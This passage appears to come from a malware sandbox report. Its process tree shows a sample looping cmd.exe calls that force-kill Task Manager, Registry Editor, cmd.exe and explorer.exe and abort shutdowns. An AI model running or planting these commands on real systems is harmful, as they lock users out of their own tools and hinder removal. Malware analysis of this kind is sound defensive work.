        6⤵
        Kills process with taskkill
        
        PID:1644
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1904
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1600
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2764
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1656
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2092
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2292
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2388
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2348
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:660
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2596
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1048
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1368
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:1380
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:812
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1604
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2908
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:836
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2940
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2356
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:932
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:664
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2436
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2944
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:888
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2248
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2432
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:684
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2152
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2112
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2580
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1576
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2016
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2572
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2256
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2844
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1592
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1532
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1588
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2872
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:3044
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1360
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2876
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2252
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2636
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:3012
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2640
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2072
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2192
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1680
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2132
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2516
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2460
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1852
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1048
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1036
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:936
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2968
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2804
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:792
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2376
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:2940
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:916
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2316
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1336
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1696
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:888
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2288
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2248
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:684
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2116
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2776
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2276
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2144
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:880
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:2256
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2352
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2844
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2180
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2272
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2868
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2928
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2260
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1556
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1360
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1772
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1212
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1632
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2148
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1608
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2884
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1720
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2556
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2192
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:108
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1724
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2064
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1280
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1136
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1504
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2460
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2848
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2320
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1152
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:812
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:528
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1796
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2960
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:760
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:2452
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2436
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:932
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2136
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1696
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2432
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2656
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:740
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:848
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2112
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2824
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2144
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2520
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1564
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2916
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2264
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2272
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1396
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1252
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2928
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2876
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2648
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2632
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1976
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1484
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2660
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1608
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:320
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2884
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2764
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1700
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1656
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:3032
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1032
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2064
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:400
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2300
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1504
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1320
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:1764
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1368
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        Kills process with taskkill
        
        PID:2924
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:112
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:984
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:836
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2788
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:336
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1844
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2956
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1848
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:964
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2892
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1696
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2152
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2360
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2056
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2608
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1516
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1664
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2144
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1592
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2520
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2736
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2548
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2916
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2708
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2720
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:3000
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1360
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2980
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1976
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2148
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1632
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:616
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1608
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1720
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:320
      - C:\Windows\SysWOW64\taskkill.exe
        
